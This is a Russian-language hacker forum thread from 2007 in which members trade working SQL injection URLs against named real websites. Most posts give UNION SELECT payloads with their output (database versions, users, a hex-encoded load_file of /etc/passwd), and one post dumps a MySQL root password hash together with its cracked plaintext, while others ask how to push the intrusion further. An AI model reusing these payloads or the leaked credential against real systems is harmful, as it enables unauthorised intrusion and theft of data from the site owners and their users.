Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.11.2007, 18:10
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
www.maika.by
вот сама скуля:
Код:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,5,6,7,8,9,10/*
мускул 5 ветки, file_priv нет, доступа к mysql.user тоже нет, ковычки фильтруются
но интересно другое, эта скуля позволяет инклюдить файлы например:
Код:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,0x2F6574632F706173737764,6,7,8,9,10/*
инклюдит /etc/passwd, данные из 5 колонки в чистом виде передаются в функцию main()
Скорее всего возможен инклюд, не только локальных файлов, но у меня неполучилось это проверить, (слишком долго связывается с народом)
на серве есть еще несколько сайтов подобной тематики
__________________
Карфаген должен быть разрушен...
|
|
|
09.11.2007, 20:41
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
XAKEP.RU
Гыыы скуля на ксакепе
Код:
http://www.xakep.ru/articles/Links/result.asp?tosearch=theme=1+or+1=@@version
кстати я там скули 3-4 нашел, но они не особо перспективные
__________________
Карфаген должен быть разрушен...
|
|
|
|
09.11.2007, 22:39
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Holokost
http://www.spmi.ru/index.php?id=6&t=show_news&nid='&lang=1
хз че это, но по моему то, что надо.
вот оно же но более раскрученно 
Код:
http://www.spmi.ru/index.php?id=6&t=show_news&nid=1' UNION SELECT '1',VERSION(),3 WHERE 1=1--
__________________
Кто я?..
|
|
|
|
09.11.2007, 22:42
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581
Репутация:
15
|
|
http://www.spmi.ru/index.php?t=skeleton'&id=3&lang=1
там же
|
|
|
|
09.11.2007, 22:45
|
|
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171
Репутация:
88
|
|
Megashara
Код:
http://megashara.com/item.php?tid=-1'%20union%20select%201,2,3,4,5,6,7,8,user,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20mysql.user/*
Таблица mysql.user Доступна
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
После расшифровки root: ghjcnjgfhjkm
Админку не нашёл.
З.Ы странно после нахождения скули сайт глючить стал
Последний раз редактировалось -MoLoToK-; 09.11.2007 в 22:48..
|
|
|
|
09.11.2007, 22:56
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581
Репутация:
15
|
|
http://www.spmi.ru/index.php?id=6&t=show_news&nid=1'%20UNION%20SELECT %20null,user,null%20WHERE%201=1--
Че дальше можно наворотить?
|
|
|
|
09.11.2007, 23:02
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Holokost
http://www.spmi.ru/index.php?id=6&t=show_news&nid=1'%20UNION%20SELECT %20null,user,null%20WHERE%201=1--
Че дальше можно наворотить?
Там кажецо PostgreSQL читай ФАКи 
http://forum.antichat.ru/showthread.php?t=35599
__________________
Кто я?..
|
|
|
|
10.11.2007, 00:46
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581
Репутация:
15
|
|
При помощи фака раздирбанил постгресс и узнал логины:пассы... Вот только их там дохрена и самые вероятные на админку не подходят((((((
|
|
|
|
10.11.2007, 01:37
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.samaranews.ru/work/view1.php?type_category=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x2F,version(),database(),user()),14,15,16,17,18/*
4.1.21-community-max-nt-log/1gb_samara/1gb_samara@10.0.2.2
--------------------------------------------------------------------
http://www.yes.spata.ru/index.php?a=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2,3,4/*
4.1.21-standard-log/spataru_yes/spataru_yes@localhost
--------------------------------------------------------------------
http://www.list.mini-soft.ru/full_link.php?nID=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9,10,11/*
4.0.18-log/minisof5_cat/minisof5_admin3@localhost
--------------------------------------------------------------------
http://www.wir1.domenonline.ru/cgi-bin/podrob.pl?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3/*
4.0.27-standard-log/wirru_wir83wir1/wirru_wir@localhost
--------------------------------------------------------------------
http://www.elfworld.ru/articles/index.php?mode=section&id=-1'+union+select+1,1,concat_ws(0x2F,cast(version()+ as+binary),cast(database()+as+binary),cast(user()+ as+binary)),1,1,1,1/*
4.0.24_Debian-10sarge2-log/erynrandir_elfw/erynrandir_elfw@localhost
|
|
|
|
10.11.2007, 02:35
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.yuretz.ru/prikol.php?id=9999+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
5.0.45-community/yuretz/yuretz@localhost
===========================================
Код:
http://www.trud.ru/issue/shortnews.php?id=-64079+union+select+1,2,concat_ws(0x2F,user(),database(),version()),load_file('etc/passwd/'),5,6,7/*
trudinfo@localhost/trudinfo_db/4.1.21-log
Последний раз редактировалось K1nD[e]R; 10.11.2007 в 02:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.gif){kind=avatar}
Похожие темы
Линейный вид
